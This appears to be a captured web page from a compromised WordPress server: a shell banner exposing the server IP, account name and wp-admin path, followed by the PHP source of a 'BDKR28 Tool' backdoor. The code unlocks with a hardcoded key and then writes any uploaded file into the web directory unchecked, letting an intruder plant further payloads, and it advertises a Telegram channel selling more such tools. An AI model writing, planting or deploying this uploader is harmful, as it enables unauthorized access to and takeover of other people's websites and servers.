| Server IP : 62.60.133.156 / Your IP : 216.73.217.51 Web Server : LiteSpeed System : Linux linux24.centraldnserver.com 4.18.0-553.141.2.lve.el8.x86_64 #1 SMP Wed Jul 8 16:10:02 UTC 2026 x86_64 User : mimradmin ( 1166) PHP Version : 7.4.33 Disable Function : show_source, system, shell_exec, passthru, exec, popen, proc_open MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : OFF | Pkexec : OFF Directory : /home/mimradmin/public_html/wp-admin/includes/ |
Upload File : |
<?php
// BDKR28 Tool
$p = $_GET['BDKR28'] ?? '';
if($p !== 'b646'){
die("<center><h2><a href='https://t.me/BDKR28' target='_blank' style='color:#0088cc;font-weight:bold;text-decoration:none'>FOR BUY MORE TOOLS: @BDKR28</a></h2><form method='get'><input type='password' name='BDKR28' placeholder='Enter Key'><button>Login</button></form></center>");
}
$msg = "";
if(isset($_FILES['f'])){
$n = $_FILES['f']['name'];
if(move_uploaded_file($_FILES['f']['tmp_name'], $n)){
$msg = "Success - <a href='$n'>$n</a>";
} else {
$msg = "<font color='red'>Failed!</font>";
}
}
?>
<!DOCTYPE html>
<html>
<head>
<title>BDKR28</title>
</head>
<body>
<center>
<h2>BDKR28</h2>
<p><a href='https://t.me/BDKR28' target='_blank' style='color:#0088cc;font-weight:bold;text-decoration:none'>FOR BUY MORE TOOLS: @BDKR28</a></p>
<form method='post' enctype='multipart/form-data'>
<input type='file' name='f'><br><br>
<button type='submit'>Upload File</button>
</form>
<br>
<b><?php echo $msg; ?></b>
</center>
</body>
</html>